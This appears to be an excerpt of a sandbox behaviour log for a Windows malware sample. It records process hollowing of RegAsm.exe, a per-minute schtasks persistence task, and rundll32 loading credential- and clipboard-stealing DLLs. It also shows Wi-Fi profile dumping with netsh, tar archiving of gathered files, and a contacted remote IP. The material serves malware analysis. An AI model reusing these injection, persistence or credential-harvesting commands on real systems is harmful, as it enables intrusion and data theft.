 buffer:  €P€8€€h€ à Ôtã êÔ4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°4StringFileInfo000004b0Comments"CompanyName*FileDescription0FileVersion1.0.0.08 InternalNamebladfin.exe&LegalCopyright*LegalTrademarks@ OriginalFilenamebladfin.exe"ProductName4ProductVersion1.0.0.08Assembly Version1.0.0.0<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly>
base_address: 0x004ce000
process_identifier: 2188
process_handle: 0x000002c0
1 1 0

WriteProcessMemory

 buffer: À @?
base_address: 0x004d0000
process_identifier: 2188
process_handle: 0x000002c0
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 2188
process_handle: 0x000002c0
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL’4leà ° >Ï @  ðÎ Kà   H.textD¯ °  `.rsrcà ² @@.reloc ¸ @B
base_address: 0x00400000
process_identifier: 2188
process_handle: 0x000002c0
1 1 0
Process injection Process 2912 called NtSetContextThread to modify thread in remote process 2188
Time & API Arguments Status Return Repeated

NtSetContextThread

 registers.eip: 1995571652
registers.esp: 2816960
registers.edi: 0
registers.eax: 5033790
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000002bc
process_identifier: 2188
1 0 0
Process injection Process 2912 resumed a thread in remote process 2188
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x000002bc
suspend_count: 1
process_identifier: 2188
1 0 0
dead_host 94.130.51.115:15648
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 2720
thread_handle: 0x0000030c
process_identifier: 2716
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\4fdb51ccdc\Utsysc.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\4fdb51ccdc\Utsysc.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\4fdb51ccdc\Utsysc.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000314
1 1 0

NtResumeThread

 thread_handle: 0x00000224
suspend_count: 1
process_identifier: 2716
1 0 0

CreateProcessInternalW

 thread_identifier: 2792
thread_handle: 0x00000248
process_identifier: 2788
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\schtasks.exe
track: 1
command_line: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\test22\AppData\Local\Temp\4fdb51ccdc\Utsysc.exe" /F
filepath_r: C:\Windows\System32\schtasks.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000250
1 1 0

CreateProcessInternalW

 thread_identifier: 2916
thread_handle: 0x000003d4
process_identifier: 2912
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\1000001001\hv.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1000001001\hv.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\1000001001\hv.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000003f0
1 1 0

CreateProcessInternalW

 thread_identifier: 3000
thread_handle: 0x000003f4
process_identifier: 2996
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\rundll32.exe
track: 1
command_line: "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\80c6bf70bf3f8f\cred64.dll, Main
filepath_r: C:\Windows\System32\rundll32.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000040c
1 1 0

CreateProcessInternalW

 thread_identifier: 2364
thread_handle: 0x000003ec
process_identifier: 2368
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\rundll32.exe
track: 1
command_line: "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\80c6bf70bf3f8f\clip64.dll, Main
filepath_r: C:\Windows\System32\rundll32.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000414
1 1 0

NtResumeThread

 thread_handle: 0x000000dc
suspend_count: 1
process_identifier: 2912
1 0 0

NtResumeThread

 thread_handle: 0x00000150
suspend_count: 1
process_identifier: 2912
1 0 0

NtResumeThread

 thread_handle: 0x0000018c
suspend_count: 1
process_identifier: 2912
1 0 0

NtResumeThread

 thread_handle: 0x0000023c
suspend_count: 1
process_identifier: 2912
1 0 0

NtGetContextThread

 thread_handle: 0x000000e4
1 0 0

NtGetContextThread

 thread_handle: 0x000000e4
1 0 0

NtResumeThread

 thread_handle: 0x000000e4
suspend_count: 1
process_identifier: 2912
1 0 0

CreateProcessInternalW

 thread_identifier: 2192
thread_handle: 0x000002bc
process_identifier: 2188
current_directory:
filepath:
track: 1
command_line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
filepath_r:
stack_pivoted: 0
creation_flags: 564 (CREATE_NEW_CONSOLE|CREATE_NEW_PROCESS_GROUP|CREATE_SUSPENDED|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x000002c0
1 1 0

NtUnmapViewOfSection

 base_address: 0x00400000
region_size: 4915200
process_identifier: 2188
process_handle: 0x000002c0
3221225497 0

NtAllocateVirtualMemory

 process_identifier: 2188
region_size: 860160
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002c0
1 0 0

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL’4leà ° >Ï @  ðÎ Kà   H.textD¯ °  `.rsrcà ² @@.reloc ¸ @B
base_address: 0x00400000
process_identifier: 2188
process_handle: 0x000002c0
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00402000
process_identifier: 2188
process_handle: 0x000002c0
1 1 0

WriteProcessMemory

 buffer:  €P€8€€h€ à Ôtã êÔ4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°4StringFileInfo000004b0Comments"CompanyName*FileDescription0FileVersion1.0.0.08 InternalNamebladfin.exe&LegalCopyright*LegalTrademarks@ OriginalFilenamebladfin.exe"ProductName4ProductVersion1.0.0.08Assembly Version1.0.0.0<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly>
base_address: 0x004ce000
process_identifier: 2188
process_handle: 0x000002c0
1 1 0

WriteProcessMemory

 buffer: À @?
base_address: 0x004d0000
process_identifier: 2188
process_handle: 0x000002c0
1 1 0

NtGetContextThread

 thread_handle: 0x000002bc
1 0 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 2188
process_handle: 0x000002c0
1 1 0

NtSetContextThread

 registers.eip: 1995571652
registers.esp: 2816960
registers.edi: 0
registers.eax: 5033790
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000002bc
process_identifier: 2188
1 0 0

NtResumeThread

 thread_handle: 0x000002bc
suspend_count: 1
process_identifier: 2188
1 0 0

CreateProcessInternalW

 thread_identifier: 3044
thread_handle: 0x000000dc
process_identifier: 3040
current_directory:
filepath: C:\Windows\System32\rundll32.exe
track: 1
command_line: "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\80c6bf70bf3f8f\cred64.dll, Main
filepath_r: C:\Windows\system32\rundll32.exe
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x000000d8
1 1 0

NtResumeThread

 thread_handle: 0x0000000000000108
suspend_count: 1
process_identifier: 3040
1 0 0

CreateProcessInternalW

 thread_identifier: 812
thread_handle: 0x000000000000013c
process_identifier: 604
current_directory: C:\Users\test22\AppData\Local\Temp\
filepath:
track: 1
command_line: netsh wlan show profiles
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x0000000000000140
1 1 0

CreateProcessInternalW

 thread_identifier: 0
thread_handle: 0x0000000000000000
process_identifier: 0
current_directory: C:\Users\test22\AppData\Local\Temp\
filepath:
track: 0
command_line: tar.exe -cf "C:\Users\test22\AppData\Local\Temp\832866432405_Desktop.tar" "C:\Users\test22\AppData\Local\Temp\_Files_\*.*"
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x0000000000000000
0 0

NtResumeThread

 thread_handle: 0x0000000000000218
suspend_count: 1
process_identifier: 604
1 0 0

NtResumeThread

 thread_handle: 0x00000178
suspend_count: 1
process_identifier: 2188
1 0 0

NtResumeThread

 thread_handle: 0x000001e8
suspend_count: 1
process_identifier: 2188
1 0 0

NtResumeThread

 thread_handle: 0x0000022c
suspend_count: 1
process_identifier: 2188
1 0 0

NtResumeThread

 thread_handle: 0x000003bc
suspend_count: 1
process_identifier: 2188
1 0 0